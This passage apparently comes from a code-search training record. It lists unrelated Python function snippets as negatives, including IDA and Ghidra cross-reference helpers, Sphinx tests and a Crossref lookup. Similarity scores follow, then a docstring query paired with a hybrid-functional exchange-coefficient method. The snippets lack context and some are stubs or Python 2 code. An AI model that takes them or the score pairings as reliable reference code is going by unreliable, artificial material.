# if xref.to is in the pool, then retrieve content if it's a pointer\r\n if xref.to < self.func_ea + size_pool:\r\n # those are the references found at the pool location\r\n iteratedOnce = False\r\n for poolRef in idautils.XrefsFrom(xref.to, 0):\r\n if iteratedOnce:\r\n raise(FunctionException(\"%08X: there should only be one data xref in pool variable\"\r\n % (self.func_ea)))\r\n # there should only be one in the pool refernce\r\n if poolRef.to not in drefs:\r\n drefs.append(poolRef.to)\r\n iteratedOnce = True\r\n else:\r\n drefs.append(xref.to)\r\n\r\n # for ref in idautils.DataRefsFrom(self.func_ea):\r\n # drefs.append(ref)\r\n # for ref in idautils.DataRefsFrom(self.func_ea - 1):\r\n # drefs.append(ref)\r\n return crefs, drefs", "def References(self, default=[{}]):\n tmp = self.data.get('metadata', {}).get('references', default)\n return [HEP.ReferenceObject(i) for i in tmp]", "def refs_ii(self):\n return self._refs_ii", "def test_xref(self):\n with sphinx_build('pyexample'):\n with open('_build/text/docfx_yaml/example.nap.Base.yml') as yml_file:\n data = yaml.safe_load(yml_file)\n for item in data['items']:\n if item['uid'] == 'example.nap.Base.ref':\n self.assertEqual(\n item['seealsoContent'],\n 'Depends on @example.example.Foo Relative reference on @example.nap.Base.foo'\n )", "def get_refs(*args, **kwargs):\n return get_refs_async(*args, **kwargs).get_result()", "def get_crefs_to( ea ):\r\n\tret = []\r\n\txrf = get_first_cref_to( ea )\r\n\tif xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\txrf = get_next_cref_to( ea, xrf )\r\n\twhile xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\t\txrf = get_next_cref_to( ea, xrf )\r\n\treturn ret", "def get_docs(self):\n return self.retrieve_docstring()", "def get_docs(self):\n return self.retrieve_docstring()", "def get_docs(self):\n return self.retrieve_docstring()", "def genReferences( self, aWeb ):\n try:\n for t in self.commands:\n ref= t.ref( aWeb )\n if ref is not None:\n yield ref\n except Error as e:\n raise", "def getReferencesTo(self, address: ghidra.program.model.address.Address) -> List[ghidra.program.model.symbol.Reference]:\n ...", "def getReferenceAnalyses(self):\n return [analysis for analysis in self.getAnalyses() \\\n if analysis.portal_type=='ReferenceAnalysis']", "def get_dependencies(self, recursive=False):\n dependencies = set()\n for reference in self.references:\n if isinstance(reference.ref_cell, Cell):\n if recursive:\n dependencies.update(reference.ref_cell.get_dependencies(True))\n dependencies.add(reference.ref_cell)\n return dependencies", "def references(self):\n return self.header('References', '').split()", "def dependencies(self, dep_context):\n if self.strict_deps:\n return self.target.strict_dependencies(dep_context)\n else:\n return list(self.target.closure(bfs=True, **dep_context.target_closure_kwargs))", "def get_drefs_from( ea ):\r\n\tret = []\r\n\txrf = get_first_dref_from( ea )\r\n\tif xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\txrf = get_next_dref_from( ea, xrf )\r\n\twhile xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\t\txrf = get_next_dref_from( ea, xrf )\r\n\treturn ret", "def get_drefs_to( ea ):\r\n\tret = []\r\n\txrf = get_first_dref_to( ea )\r\n\tif xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\txrf = get_next_dref_to( ea, xrf )\r\n\twhile xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\t\txrf = get_next_dref_to( ea, xrf )\r\n\treturn ret", "def get_refs(genome_build, aligner, config):\n find_fn = _find_file(config[CONFIG_KEY], startswith=True)\n ref_prefix = sret.find_ref_prefix(genome_build, find_fn)\n return sret.standard_genome_refs(genome_build, aligner, ref_prefix, _list(config[CONFIG_KEY]))", "def ExtractOperations(toolF):\n return [o[\"uri\"] for o in toolF[\"operation\"]]", "def getRefs(self):\n\n backend = self.backend\n refs = self.moduleRefs\n for ref in refs:\n refPure = ref.rsplit(\":\", 1)[0]\n if refPure in self.seen:\n continue\n\n parts = splitModRef(ref)\n if not parts:\n self.good = False\n continue\n\n parts[2] = prefixSlash(normpath(parts[2])) # the relative bit\n theBackend = (\n None if parts[-1] is None or parts[-1] == backend else parts[-1]\n )\n\n if not self.getModule(*parts[0:-1], backend=theBackend):\n self.good = False", "def docs():", "def ref(request):\n r = referencepytest.ref(request)\n this_dir = os.path.abspath(os.path.dirname(__file__))\n r.set_data_location(os.path.join(this_dir, '..', 'reference'))\n return r", "def reference_types(self):\n return self.references.keys()", "def reference_types(self):\n return self.references.keys()", "def references(self):\n return tuple(self.__references)", "def list_ref_keys(self):\n print('=======')\n print('REFs')\n print('=======')\n for key in self.refs:\n print(key)", "def get_handle_referents(self):\n return self.get_citation_child_list()", "def test_references() -> None:\n soup = generate_case(\"references\")\n\n tests.html_schema_doc_asserts.assert_property_names(\n soup,\n [\n \"a_gift\",\n \"file_prefix\",\n \"anchor_with_slash\",\n \"propertyA\",\n \"anchor_no_slash\",\n \"anchor_nested_reference\",\n \"same_file_anchor_with_slash\",\n \"same_file_anchor_no_slash\",\n \"same_file_nested_reference\",\n \"other_file_anchor\",\n \"with_wrap\",\n \"other_file_dot_anchor\",\n \"other_file_dot_dot_anchor\",\n \"other_file_only\",\n \"not_a_string\",\n \"multi_hierarchy_reference\",\n \"propertyA\",\n ],\n )\n tests.html_schema_doc_asserts.assert_descriptions(\n soup,\n [\n \"Testing $ref\",\n \"A gift, or is it?\",\n \"A gift, or is it?\",\n \"Description for object_def/items/propertyA\",\n \"Description for array_def\",\n \"Description for string_def\",\n \"The delivery is a gift, no prices displayed\",\n \"The delivery is a gift, no prices displayed\",\n \"The delivery is a gift, no prices displayed\",\n \"Test schema with a not\",\n \"Contents of propertyA in final.json\",\n ],\n )\n tests.html_schema_doc_asserts.assert_types(\n soup,\n [\n \"object\", # root\n \"string\", # a_gift\n \"string\", # file_prefix\n \"object\", # anchor_with_slash\n \"string\", # anchor_with_slash -> propertyA\n \"array of string\", # anchor_no_slash\n \"string\", # anchor_no_slash items\n \"string\", # anchor_nested_reference\n \"string\", # same_file_anchor_with_slash\n \"object\", # same_file_anchor_no_slash\n \"string\", # same_file_nested_reference\n \"object\", # other_file_anchor\n \"boolean\", # other_file_anchor -> with_wrap\n \"object\", # other_file_dot_anchor\n \"object\", # other_file_dot_dot_anchor\n \"object\", # other_file_only\n \"string\", # not_a_string, not\n \"object\", # multi_hierarchy_reference\n \"string\", # multi_hierarchy_reference -> propertyA\n ],\n )", "def get_crossrefs(self):\n inter = self.get_interaction()\n crossrefs = {inter: inter.get_crossrefs()}\n crossrefs.update(self._economics.get_crossrefs())\n return crossrefs", "def __doc__(self):\n return self.fget.__doc__", "def get_fsleyes_deps():\n\n # The dependency list is stored in requirements.txt\n with open(op.join(basedir, 'requirements.txt'), 'rt') as f:\n install_requires = f.readlines()\n\n return [i.strip() for i in install_requires]", "def get_supported_dofs(self) -> list[int]:\n\n return flatten([node.get_restrained_dofs() for node in self.nodes])", "def test_v1_alert_ref_list_get(self):\n pass", "def get_refnodes(\n self, doctree: Node, result: list[dict[str, Any]],\n ) -> list[dict[str, Any]]:\n # XXX: is there a better way than checking the attribute\n # toctree-l[1-8] on the parent node?\n if isinstance(doctree, nodes.reference) and doctree.get('refuri'):\n refuri = doctree['refuri']\n if refuri.startswith(('http://', 'https://', 'irc:', 'mailto:')):\n return result\n classes = doctree.parent.attributes['classes']\n for level in range(8, 0, -1): # or range(1, 8)?\n if (self.toctree_template % level) in classes:\n result.append({\n 'level': level,\n 'refuri': html.escape(refuri),\n 'text': ssp(html.escape(doctree.astext())),\n })\n break\n elif isinstance(doctree, nodes.Element):\n for elem in doctree:\n result = self.get_refnodes(elem, result)\n return result", "def readlink_ops(self):\n return self._readlink_ops", "def getListOfReferenceGlyphs(self, *args):\n return _libsbml.GeneralGlyph_getListOfReferenceGlyphs(self, *args)", "def _expand_ref(self, element): \n if element.tag == 'xref':\n target = element.attrib.get('target', '')\n format = element.attrib.get('format', self.defaults['xref_format'])\n item = self._getItemByAnchor(target)\n if not self.indexmode:\n if not item:\n xml2rfc.log.warn(\"Can't resolve xref target %s\" % target)\n else:\n item.used = True\n # Create xref from index lookup\n if not item:\n text = '[' + target + ']'\n elif format == 'none':\n text = ''\n elif format == 'counter':\n text = item.counter\n elif format == 'title':\n text = item.title.strip() if item.title else ''\n else:\n # Default\n text = item.autoName\n\n # following the V3 HTML -\n # If you specify text, that is what you get.\n if element.text:\n text = element.text.rstrip()\n \n a = E.A(href='#' + target)\n a.attrib[\"class\"] = \"xref\"\n a.text = text\n if element.tail:\n a.tail = element.tail\n \n return [a]\n\n elif element.tag == 'eref':\n target = element.attrib.get('target', '')\n if element.text:\n a = E.A(element.text, href=target)\n a.tail = element.tail\n return [a]\n else:\n sp1 = E.SPAN('<')\n a = E.A(target, href=target)\n sp2 = E.SPAN('>')\n sp2.tail = element.tail\n return [sp1, a, sp2]\n elif element.tag == 'cref':\n self.cref_counter += 1\n anchor = element.attrib.get('anchor', None)\n if anchor is None:\n anchor = 'CREF' + str(self.cref_counter)\n a = E.A('[' + anchor + ']', id=anchor)\n a.attrib['class'] = 'info'\n source = element.attrib.get('source', '')\n if source:\n source = source + \": \"\n b = E.SPAN(source + element.text)\n b.attrib['class'] = 'info'\n a.append( b )\n self._indexCref(self.cref_counter, anchor)\n if element.tail:\n a.tail = element.tail\n return [a]\n elif element.tag == 'iref':\n return self._add_iref_to_index(element)\n elif element.tag == 'spanx':\n style = element.attrib.get('style', self.defaults['spanx_style'])\n text = ''\n if element.text:\n text = element.text\n elem = None\n if style == 'strong':\n elem = E.STRONG(text)\n elif style == 'verb':\n elem = E.SAMP(text)\n else:\n # Default to style=emph\n elem = E.EM(text)\n if element.tail:\n elem.tail = element.tail\n return [elem]", "def references(self):\n return self._get_related_resources(False)", "def links(self):\n inp, out = self.signature\n if self.is_function():\n using = self.function.function\n if not all(inp) or not out:\n return []\n link = core.component_link.ComponentLink(inp, out, using)\n return [link]\n if self.is_helper():\n helper = self.function.helper\n if not all(inp):\n return []\n return helper(*inp)", "def test_getCpfRelationLinks(self):\n cases = [\n (self.test_eac + \"NE00601.xml\", 3),\n (self.test_eac + \"NE00100.xml\", 6),\n (self.test_eac + \"NE00201.xml\", 6),\n ]\n for case in cases:\n source, expected = case\n doc = EacCpf.EacCpf(source, 'http://www.example.com')\n self.assertNotEqual(None, doc)\n result = doc.getCpfRelationLinks()\n self.assertNotEqual(None, result)\n self.assertEqual(expected, len(result))", "def get_dependencies(self, recursive=False):\n dependencies = set()\n for element in self.elements:\n if isinstance(element, CellReference) or isinstance(\n element, CellArray):\n if recursive:\n dependencies.update(\n element.ref_cell.get_dependencies(True))\n dependencies.add(element.ref_cell)\n return dependencies", "def get_explorer_toolbox() -> List[Tuple[str, str, str]]:\n explorer_toolbox = list(_explorer_toolbox)\n explorer_toolbox.extend(\n (func_name, title, description)\n for func_name, title, description in _bio2bel_functions\n if _function_is_registered(func_name)\n )\n return explorer_toolbox", "def help_links():\n return [\n {\"text\": \"Python Reference\", \"url\": PY_DOCS},\n {\"text\": \"IPython Reference\", \"url\": IPYTHON_DOCS},\n {\n \"text\": \"Robot Framework: User Guide\",\n \"url\": ujoin(ROBOT_DOCS, \"RobotFrameworkUserGuide.html\"),\n },\n *[\n {\n \"text\": f\"{lib} — Robot Framework\",\n \"url\": ujoin(ROBOT_DOCS, \"libraries\", f\"{lib}.html\"),\n }\n for lib in sorted(STDLIBS)\n if lib not in HAS_NO_DOC\n ],\n ]", "def make_crossref_fundref(dataset: ObservatoryDataset) -> List[Dict]:\n\n records = []\n\n for funder in dataset.funders:\n records.append(\n {\n \"pre_label\": funder.name,\n \"funder\": f\"http://dx.doi.org/{funder.doi}\",\n \"country_code\": funder.country_code,\n \"region\": funder.region,\n \"funding_body_type\": funder.funding_body_type,\n \"funding_body_sub_type\": funder.funding_body_subtype,\n }\n )\n\n return records", "def DataRefsFrom(ea):\n xref = ida_xref.xrefblk_t()\n yield from xref.drefs_from(ea)", "def get_link_fields(doctype):\n\timport webnotes.model.doctype\n\tdoclist = webnotes.model.doctype.get(doctype)\n\treturn [\n\t\t(d.fields.get('fieldname'), d.fields.get('options'), d.fields.get('label'))\n\t\tfor d in doclist\n\t\tif d.fields.get('doctype') == 'DocField' and d.fields.get('parent') == doctype\n\t\tand d.fields.get('fieldname')!='owner'\n\t\tand (d.fields.get('fieldtype') == 'Link' or\n\t\t\t(\td.fields.get('fieldtype') == 'Select'\n\t\t\t\tand (d.fields.get('options') or '').startswith('link:'))\n\t\t\t)\n\t]", "def get_referenced_handles(self):\n return (self.get_referenced_note_handles() +\n self.get_referenced_tag_handles())", "def listCmdDoc(self):\n attr = self.__listAttr()\n filter = []\n for name in attr:\n if name[:1] == '_': pass\n elif name[-6:] == '_usage': pass\n else: filter.append(name)\n return filter", "def getDocsList(self):\n return self.docs_list", "def list_ref0s(self):\n print('-----\\nREF0s\\n-----')\n self._print_dict(self.ref0s)", "def RawRefs(self, default=[{}]):\n tmp = self.data.get('raw_refs', default)\n return [HEP.RawReferenceObject(i) for i in tmp]", "def get_references(caller, callee):\n function_manager = currentProgram.getFunctionManager()\n\n ref_list = []\n callee_symbol = callee.getSymbol()\n callee_references = callee_symbol.getReferences()\n\n for ref in callee_references:\n addr = ref.getFromAddress()\n func = function_manager.getFunctionContaining(addr)\n if func == caller:\n ref_list.append(addr)\n\n return ref_list", "def ref(self):\n\t\treturn self.bottle.ref", "def create_included_function_list_readme():\n import iteration_utilities\n from iteration_utilities import Iterable\n from itertools import chain\n from operator import itemgetter\n from astropy.table import Table\n from astropy.io.ascii import RST\n\n rtd_link = '`{name} <http://iteration-utilities.readthedocs.io/en/latest/api/{file}.html#{module}.{name}>`_'\n\n module_to_file = {'iteration_utilities': 'cfuncs',\n 'iteration_utilities._cfuncs': 'cfuncs',\n 'iteration_utilities._helpers._performance': 'helper',\n 'iteration_utilities._recipes._additional': 'additional',\n 'iteration_utilities._recipes._core': 'core',\n }\n\n it = Iterable(chain(iteration_utilities._cfuncs.__dict__.items(),\n iteration_utilities._helpers._performance.__dict__.items(),\n iteration_utilities._recipes._core.__dict__.items(),\n iteration_utilities._recipes._additional.__dict__.items())\n # Exclude PY2 variable and private functions\n ).filterfalse(lambda x: x[0].startswith(('PY2', '_'))\n # Exclude everything that has no __module__\n ).filter(lambda x: hasattr(x[1], '__module__')\n # Only include functions that come from the package\n ).filter(lambda x: x[1].__module__.startswith('iteration_utilities')\n # Remove duplicate names\n ).unique_everseen(itemgetter(0)\n # Sort lexically\n ).get_sorted(key=lambda x: x[0].lower())\n\n it = Iterable(it\n # Create a Sphinx link from function name and module\n ).map(lambda i: rtd_link.format(file = module_to_file[i[1].__module__],\n module = i[1].__module__,\n name = i[0])\n # Group into 4s so we get a 4 column Table\n ).grouper(4, fillvalue=''\n # Convert to list because Table expects it.\n ).as_list()\n\n return '\\n'.join(RST().write(Table(rows=it)))", "def getdoc(doctype, name, user=None):\n\n\timport webnotes\n\t\n\tif not (doctype and name):\n\t\traise Exception, 'doctype and name required!'\n\t\n\tif not name: \n\t\tname = doctype\n\n\tif not webnotes.conn.exists(doctype, name):\n\t\treturn []\n\n\ttry:\n\t\tbean = webnotes.bean(doctype, name)\n\t\tbean.run_method(\"onload\")\n\n\t\tdoclist = bean.doclist\n\n\t\t# add file list\n\t\tset_docinfo(doctype, name)\n\t\t\n\texcept Exception, e:\n\t\twebnotes.errprint(webnotes.utils.getTraceback())\n\t\twebnotes.msgprint('Did not load.')\n\t\traise e\n\n\tif bean and not name.startswith('_'):\n\t\twebnotes.user.update_recent(doctype, name)\n\t\n\twebnotes.response['docs'] = doclist", "def __get_references(self):\n named_references = []\n for usage in self.xml_cache.get_xml_tree(\"usagemodel\"):\n variable_usages = usage.findall(\".//namedReference__VariableUsage\")\n for name in variable_usages:\n named_references.append(name.get(\"referenceName\"))\n return named_references", "def find_book_dois_in_crossref(isbn_list):\n ret_value = {\n \"success\": False,\n \"dois\": []\n }\n if type(isbn_list) != type([]) or len(isbn_list) == 0:\n ret_value['error_msg'] = \"Parameter must be a non-empty list!\"\n return ret_value\n filter_list = [\"isbn:\" + isbn.strip() for isbn in isbn_list]\n filters = \",\".join(filter_list)\n api_url = \"https://api.crossref.org/works?filter=\"\n url = api_url + filters + \"&rows=500\"\n request = Request(url)\n request.add_header(\"User-Agent\", USER_AGENT)\n try:\n ret = urlopen(request)\n content = ret.read()\n data = json.loads(content)\n if data[\"message\"][\"total-results\"] == 0:\n ret_value[\"success\"] = True\n else:\n for item in data[\"message\"][\"items\"]:\n if item[\"type\"] in [\"monograph\", \"book\"] and item[\"DOI\"] not in ret_value[\"dois\"]:\n ret_value[\"dois\"].append(item[\"DOI\"])\n if len(ret_value[\"dois\"]) == 0:\n msg = \"No monograph/book DOI type found in Crossref ISBN search result ({})!\"\n raise ValueError(msg.format(url))\n else:\n ret_value[\"success\"] = True\n except HTTPError as httpe:\n ret_value['error_msg'] = \"HTTPError: {} - {}\".format(httpe.code, httpe.reason)\n except URLError as urle:\n ret_value['error_msg'] = \"URLError: {}\".format(urle.reason)\n except ValueError as ve:\n ret_value['error_msg'] = str(ve)\n return ret_value", "def get_docs_urls(self):\n docs_urls = []\n link_labels = []\n for tag in self.post_div.find_all(\"a\"):\n url = tag[\"href\"]\n if url.startswith(\"https://docs.google.com\") or \\\n url.startswith(\"https://drive.google.com\"):\n docs_urls += [url]\n link_labels += [tag.text]\n return docs_urls, link_labels", "def reference_only(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"reference_only\")", "def reference_names(self):\n return [name for name in self.selector.reference_names() if not is_special_value(name)]", "def check_references(swagger: Dict):\n events = set()\n\n ref_jspath = JSPATH_REFERENCES\n\n for _, reference, path in get_elements(swagger, ref_jspath):\n # handle only local references\n if reference.startswith(\"#/\"):\n # decompose reference (error if not possible)\n try:\n rt, obj = reference[2:].split(\"/\")\n except ValueError:\n events.add(\n ReferenceInvalidSyntax(\n path=path, reason=f\"reference {reference} not of the form '#/section/item'\"\n )\n )\n continue\n\n if rt not in REFERENCE_SECTIONS:\n events.add(\n ReferenceInvalidSection(\n path=path,\n reason=f\"Reference {reference} not referring to one of the sections {REFERENCE_SECTIONS}\",\n )\n )\n\n # resolve reference (error if not possible)\n try:\n swagger[rt][obj]\n except KeyError:\n events.add(\n ReferenceNotFoundValidationError(\n path=path, reason=f\"reference '#/{rt}/{obj}' does not exist\"\n )\n )\n\n return events", "def DataRefsTo(ea):\n xref = ida_xref.xrefblk_t()\n yield from xref.drefs_to(ea)", "def get_noncall_crefs_to( ea ):\r\n\tret = []\r\n\txrf = get_first_cref_to( ea )\r\n\tif xrf != BADADDR:\r\n\t\tif ua_mnem( xrf ) != \"call\":\r\n\t\t\tret.append( xrf )\r\n\telse:\r\n\t\tif ea not in get_far_crefs_from( xrf ):\r\n\t\t\tret.append( xrf )\r\n\txrf = get_next_cref_to( ea, xrf )\r\n\twhile xrf != BADADDR:\r\n\t\tif ua_mnem( xrf ) != \"call\":\r\n\t\t\tret.append( xrf )\r\n\t\txrf = get_next_cref_to( ea, xrf )\r\n\treturn ret", "def fetch_citylink_refs(self):\n tree = html.fromstring(self.fetch_manifest())\n self_refs = tree.xpath('//table/tr/td/table/tr[position()>4]/td[1]/text()')\n return [x.strip() for x in self_refs[:-1]]", "def references(self) -> Collection[Access]:\n # we don't want to publicly expose the mutable version of this\n return self.__accesses", "def test_getFunctions(self):\n cases = [\n (self.test_eac + \"NE01100.xml\", 4),\n (self.test_eac + \"NE01101.xml\", 8),\n (self.test_eac + \"NE01501.xml\", 0),\n (self.test_eac + \"NE00001.xml\", 0),\n ]\n for case in cases:\n source, expected = case\n doc = EacCpf.EacCpf(source, 'http://www.example.com')\n self.assertNotEqual(doc, None)\n result = doc.getFunctions()\n self.assertNotEqual(result, None)\n self.assertEqual(len(result), expected)", "def get_far_crefs_from( ea ):\r\n\tret = []\r\n\txrf = get_first_fcref_from( ea )\r\n\tif xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\txrf = get_next_fcref_from( ea, xrf )\r\n\twhile xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\t\txrf = get_next_fcref_from( ea, xrf )\r\n\treturn ret", "def getRefs( self, par, path ):\n\n return self.db.getRefsPar( par, path )" ]
[ "0.6066506", "0.59986335", "0.581545", "0.57736564", "0.5760365", "0.573005", "0.5729725", "0.5693465", "0.5646567", "0.5640934", "0.56323737", "0.55529517", "0.5526186", "0.5518354", "0.55112725", "0.5438071", "0.5417537", "0.5400339", "0.53872216", "0.5386622", "0.53764004", "0.53672266", "0.5356825", "0.535014", "0.5306735", "0.53040814", "0.52634984", "0.5250621", "0.52471584", "0.52383137", "0.52376306", "0.5206087", "0.5199984", "0.5181189", "0.5155229", "0.5154959", "0.51541317", "0.5148369", "0.51451814", "0.5138968", "0.5138968", "0.5138968", "0.5135862", "0.5135502", "0.512947", "0.5104735", "0.5083737", "0.50767034", "0.5071842", "0.50697035", "0.5068137", "0.50661653", "0.5055266", "0.5025612", "0.5006902", "0.49996835", "0.49996835", "0.49785003", "0.49769932", "0.49679095", "0.49543378", "0.49430078", "0.4941936", "0.4923499", "0.49231726", "0.49050808", "0.4901296", "0.48939297", "0.48910567", "0.48703313", "0.486843", "0.485347", "0.48524615", "0.48481315", "0.4841523", "0.48358947", "0.4831182", "0.48301643", "0.48273525", "0.48194185", "0.48164496", "0.47995007", "0.47949484", "0.47943273", "0.47936204", "0.4789749", "0.4785538", "0.47848514", "0.47786275", "0.4774898", "0.47648704", "0.47612995", "0.47608975", "0.47577333", "0.47537994", "0.47419968", "0.47391734", "0.4733693", "0.47315982", "0.47267094", "0.47191092" ]
0.0
-1
Returns the amount of global exchange to include.
def get_hyb_exx_coef(self): if self._family not in [flags.XC_FAMILY_HYB_LDA, flags.XC_FAMILY_HYB_GGA, flags.XC_FAMILY_HYB_MGGA]: raise ValueError("get_hyb_exx_coef can only be called on hybrid functionals.") if self._have_cam: raise ValueError("get_hyb_exx_coef cannot be called on range-separated functionals.") return self._cam_alpha
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_total_instruments(self):\n\n total = 0\n for exchange in self.exchanges:\n total += len(exchange.symbols)\n return total", "def CountGlobal():\r\n return _hiew.HiewGate_Names_CountGlobal()", "def getGlobalSize(self):\n return self._get_global_size( )", "def GOAL_TOTAL() -> int:\n return 21", "def import_grid(self):\n return max(0, self.current_energy_consumed - self.current_energy_produced)", "def _numQueuedTotal(self):\n queueSize = len(self.__queue) + len(self.__clientQueue)\n return queueSize", "def total_additional_charges(self) -> int:\n total = 0\n additional_charges = self.additional_charges\n if additional_charges:\n for charge in additional_charges:\n total += charge['amount']\n return total", "def get_total_supply() -> int:\n return total_supply", "def GlobalSize(self):\n return _hypre.HypreParVector_GlobalSize(self)", "def global_symbols_size(self):\n size = 0\n for s in self.global_symbols:\n if self.global_symbols[s].type == 'procedure': continue\n size += self.global_symbols[s].size\n return size", "def ship_count(self):\r\n return sum(f.ship_count for f in self)", "def total_energy(self):\n return self._total_energy", "def _handle_icx_get_total_supply(self,\n context: 'IconScoreContext',\n params: dict) -> int:\n return self._icx_engine.get_total_supply(context)", "def total_market_value(self):\n return self.pos_handler.total_market_value()", "def _grand_total(self):\n count = 0\n for product in self.products:\n count += product.price\n return count", "def amount_raised_online(self):\r\n return self.stats.amount_raised_online", "def COUNTER_TOTAL():\n return 3", "def get_exchange_reward_per_euro(model):\n exchanged_euros = get_exchanged_euros(model)\n total_euros = get_total_euros(model) \n total_teos = get_total_teos(model)\n exchange_pool = (total_euros - total_teos)*model.buffer_share*model.exchange_reward_share\n if exchanged_euros == 0 or exchange_pool <= 0:\n return 0\n exchange_reward_per_euro = exchange_pool / exchanged_euros \n return round(float(exchange_reward_per_euro),4)", "def siterequestbytesrate(self) :\n\t\ttry :\n\t\t\treturn self._siterequestbytesrate\n\t\texcept Exception as e:\n\t\t\traise e", "def get_amount(self): \n return len(self.get_cards())", "def customAmount(self, guildId):\n return len(self.custom[str(guildId)])", "def base_exchange_rate(self):\n return self._base_exchange_rate", "async def get_garages_total(self):\r\n async with self._db.acquire() as conn:\r\n s = await (await conn.execute(Garage.count())).scalar()\r\n return s", "def comptotalrequests(self) :\n\t\ttry :\n\t\t\treturn self._comptotalrequests\n\t\texcept Exception as e:\n\t\t\traise e", "def available(self):\n return self.stock_level - self.in_order_book", "def get_total_count(self):\n return self.total_count", "def get_fuel_total_saved (self):\n return self.electric_diesel_reduction + self.reduction_diesel_used", "def amount(self):\n return(self.order_master.amount)", "def number_transfers(self, quota):\n if self.elected:\n return len(self.first_votes) - quota\n else:\n return 0", "def total(self):\n\t\treturn self._total", "def getTotalShips(session):\n html = session.get()\n return int(re.search(r'maxTransporters\">(\\d+)<', html).group(1))", "def get_inbound_statements_grid_total_amount_internal(self):\n return self.get_specific_column_value_from_grid(self.inbound_statement_grid_div_id, self.inbound_statements_grid_row_count, self.inbound_statements_grid_total_amount_internal_column_name)", "def get_num_gratings(self):\r\n msg = struct.pack('>2B', 56, 13)\r\n response = self.query(msg)\r\n return response[1]", "def outstanding(self):\n return sum(\n transfer.lock.amount\n for transfer in self.locked.values()\n )", "def _get_total_games(self) -> int:\n files = get_tfr_filenames(self.config)\n total_games = 0\n for file in files:\n total_games += int(str(file).split('-')[1].split('.')[0])\n return total_games", "def target_totalfiles(self):\n return self._cfg.get('totalfiles', None)", "def online_quota(self):\r\n return self.max_contributions - self.num_tickets_total", "def module_count(self):\n return self._module_count", "def totalEffectiveLoad(self):\n return sum(s.effectiveLoad() for s in self.dispatcher.statuses)", "def usedspace(self):\n self.log.info(\"freespace\")\n nbytes = 0\n keys = list(self.downloads.keys())\n keys.sort()\n for key in keys:\n download = self.downloads[key]\n nbytes += download['size']\n self.log.info(\"returning:\" + str(nbytes))\n return nbytes", "def fs_hybrid_cache_size_total(self):\n return self._fs_hybrid_cache_size_total", "def get_totals(self):\n return self._get('app_totals')", "def stats(self):\r\n\t\tdata = self._get('global/', query=None)\r\n\t\treturn data", "def _get_echo_req_sent_count(self):\n return self.__echo_req_sent_count", "def total_pulls(self) -> int:\n return self.__total_pulls", "def get_total_energy_produced (self):\n return self.net_generation_wind", "def get_total_distributed(self) -> int:\n return self._total_distributed.get()", "def getAmount(self):\n return self.base.get(\"amount\", [])", "def get_inbound_statements_grid_amount(self):\n return self.get_specific_column_value_from_grid(self.inbound_statement_grid_div_id, self.inbound_statements_grid_row_count, self.inbound_statements_grid_amount_column_name)", "def get_num_gear(self):\n return self.__num_gear_collected", "def fs_files_total(self):\n return self._fs_files_total", "def total_storage(self):\n return self._total_storage", "def xp_share(self):\n pilots = 0\n xp = 0\n for s in self.session_set.all():\n pilots = pilots + s.pilots.count()\n xp = xp + s.xp_total\n return floor(xp/pilots)", "def transfered_amount(self):\n return self.our_state.transfer_amount", "def ReceiveIncomingDelivery(self):\r\n quantityReceived = self.incomingDeliveriesQueue.PopEnvelope()\r\n \r\n if quantityReceived > 0:\r\n self.currentStock += quantityReceived\r\n \r\n return quantityReceived", "def cal_globalIndexH(self):\n h_local = self.cal_localIndexH()\n h_global = np.sum(h_local)\n\n return h_global", "def num_global_external_references(self):\n if self.global_external_references:\n return len(self.global_external_references)\n else:\n return 0", "def fs_total_reserved_space(self):\n return self._fs_total_reserved_space", "def get_total_haberes(self):\n return float(self.input.get_text(liquidaciones_historicas_catalog.TOTAL_HABERES).replace(\".\", \"\"))", "def total_raised(self):\n return self.total_donated() + (self.community_contribution or 0)", "def grand_total(self):\n return sum(self.grid[pos][1] for pos in assignable_positions if self.grid[pos][0]) + self.grid[\"nb\"][1]", "def total(self) -> int:\n return self._total", "def amount_raised_by_tickets(self):\r\n return self.stats.amount_raised_by_tickets", "def total_purchase(self):\n\n total_amount = 0\n #grab all the item\n items = self.item_set.all()\n for item in items:\n total_amount += item.price\n return total_amount", "def total_files_to_process(self) -> float:\n return pulumi.get(self, \"total_files_to_process\")", "def get_usage(self, source):\n return sum(i.quantity for i in self.items.all() if i.source == source)", "def get_total_energy_produced (self):\n return self.pre_intertie_generation[:self.actual_project_life]", "def _get_echo_req_received_count(self):\n return self.__echo_req_received_count", "def unmerged_total(self):\n return int(self.git.rev_list('--count', '{}..{}'.format(self.base_branch, self.topic_branch)))", "def total(self):\n if self.dynamic:\n self._update_db_obj()\n return self._db_obj.total", "def GetGlobalNumRows(self):\n return _hypre.HypreParMatrix_GetGlobalNumRows(self)", "def total_clearance(self):\n total_clearances = 0\n debit = 0 #variable to track the remaining debit\n clearances = self.clearance_set.all() #grab all the previous clerances\n for clearance in clearances:\n total_clearances += clearance.paid_value\n return total_clearances", "def bytes_total(self):\n return int(self.status[\"pgmap\"][\"bytes_total\"])", "def energyplus_its(self):\n if self._energyplus_its is None:\n self._energyplus_its = 0\n return self._energyplus_its", "def number_of_open_sites(self):\n return sum(sum(line) for line in self._grid)", "def _qty_precision(self) -> int:\n return selectors.get_exchange(self.exchange).vars['precisions'][self.symbol]['qty_precision']", "def charge(self):\n return sum(self.charges)", "def current_used(self):\n praises = self.caller.get_current_praises_and_condemns()\n return sum(ob.number_used for ob in praises)", "def get_total_redeem(self):\n total = 0\n for redeem in self.get_redeems():\n total += redeem.get_total()\n return total", "def basket_total_incl_tax(self):\n return self.total_incl_tax - self.shipping_incl_tax - self.surcharge_incl_tax", "def _get_hop_limit(self):\n return self.__hop_limit", "def _get_hop_limit(self):\n return self.__hop_limit", "def _get_hop_limit(self):\n return self.__hop_limit", "def _get_hop_limit(self):\n return self.__hop_limit", "def _get_hop_limit(self):\n return self.__hop_limit", "def _get_hop_limit(self):\n return self.__hop_limit", "def _get_gs_energies(self):\n energy = []\n for ground_state in self._ground_states:\n gs_energy = 0.0\n for key in ground_state[\"eci\"].keys():\n gs_energy += ground_state[\"eci\"][key] * 